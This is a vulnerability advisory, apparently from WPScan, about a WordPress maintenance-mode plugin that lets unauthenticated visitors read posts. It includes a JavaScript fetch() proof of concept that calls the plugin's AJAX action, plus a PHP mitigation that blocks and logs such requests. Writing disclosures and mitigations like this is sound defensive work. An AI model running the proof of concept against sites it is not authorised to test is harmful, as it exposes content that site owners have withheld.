Wpvulndb WPVDB-ID:2E07FFD9-8E82-4078-96AA-162EF78C417B
Mar 07, 2023 - 12:00 a.m.

Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access in Maintenance Mode

2023-03-07 00:00:00
wpscan.com
unauthenticated access
published posts
maintenance mode
web browser
plugin vulnerability

EPSS: 0.003 Low
Percentile: 65.6%

The plugin does not restrict access to published, non-protected posts/pages when maintenance mode is enabled, allowing unauthenticated users to access them.

PoC

Run the command below in the web browser's developer console while on the blog as an unauthenticated user, with maintenance mode enabled:

    fetch("/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "method": "POST",
      "body": 'action=cmp_get_post_detail&id=42',
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));
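A stopgap for sites that cannot yet update to 4.1.7 or later, as an added example that is not code from the plugin or from the advisory: a must-use plugin that refuses the `cmp_get_post_detail` AJAX action for logged-out visitors and logs each attempt. The file name, the function name `example_block_cmp_post_detail` and the log message format are hypothetical. It assumes the plugin registers its handler through WordPress's standard `wp_ajax_nopriv_` hook, and it may also disable a front-end feature of the maintenance page that relies on this action.

```php
<?php
/**
 * Plugin Name: Block unauthenticated cmp_get_post_detail (temporary mitigation)
 *
 * Hypothetical file: wp-content/mu-plugins/block-cmp-post-detail.php
 * Added example, not part of the CMP plugin. Remove it once the plugin
 * has been updated to 4.1.7 or later.
 */

// WordPress fires wp_ajax_nopriv_{action} only for requests made without a
// logged-in user. Hooking at the lowest possible priority makes this callback
// run before the handler the plugin is assumed to register on the same hook.
add_action( 'wp_ajax_nopriv_cmp_get_post_detail', 'example_block_cmp_post_detail', PHP_INT_MIN );

function example_block_cmp_post_detail() {
    // Record the attempt so it can be reviewed or alerted on later.
    $post_id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    $remote  = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    error_log( sprintf(
        'Blocked unauthenticated cmp_get_post_detail request: post id %d from %s',
        $post_id,
        $remote
    ) );

    // wp_send_json_error() sends the response and ends the request, so the
    // plugin's own handler never runs and no post content is returned.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}
```

With this in place, the request shown in the PoC should receive an HTTP 403 JSON error instead of post content.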

CPE
Name                          Operator    Version
cmp-coming-soon-maintenance   lt          4.1.7
